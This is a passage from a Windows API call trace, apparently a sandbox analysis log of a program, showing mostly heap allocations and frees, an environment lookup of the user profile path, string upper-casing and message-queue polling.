lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0152.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0152.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0152.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0152.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0152.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0152.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0152.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0152.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0152.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0152.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0152.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0152.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0152.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0152.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0152.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0152.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0152.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0152.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0152.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0152.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0152.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0152.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0152.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0152.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0152.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0152.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0152.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0152.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0152.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0152.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0152.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0152.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0152.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0152.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0152.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0152.166] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0152.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0152.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0152.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0152.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0152.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0152.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0152.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0152.167] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0152.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0152.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0152.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0152.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0152.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0152.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0152.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0152.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0152.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0152.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0152.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0152.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0152.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0152.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0152.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0152.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0152.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0152.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0152.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0152.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0152.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0152.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0152.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0152.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0152.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722c8 [0152.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0152.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72208 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0152.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0152.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0152.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0152.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0152.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0152.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0152.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0152.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0152.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0152.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0152.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0152.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0152.169] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0152.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0152.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0152.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0152.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0152.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0152.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0152.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0152.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0152.169] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0152.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0152.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0152.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0152.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0152.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0152.169] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0152.169] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0152.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0152.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0152.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0152.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0152.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0152.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0152.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0152.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0152.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0152.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0152.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0152.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0152.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0152.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0152.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0152.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0152.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0152.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0152.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0152.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0152.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0152.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0152.174] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0152.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0152.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0152.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0152.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0152.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0152.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0152.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0152.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0152.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0152.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0152.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0152.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0152.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0152.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0152.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0152.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0152.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0152.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0152.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0152.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0152.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0152.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0152.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0152.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0152.175] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0152.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0152.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0152.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0152.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.176] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0152.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0152.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0152.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0152.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.177] RtlAllocateHeap 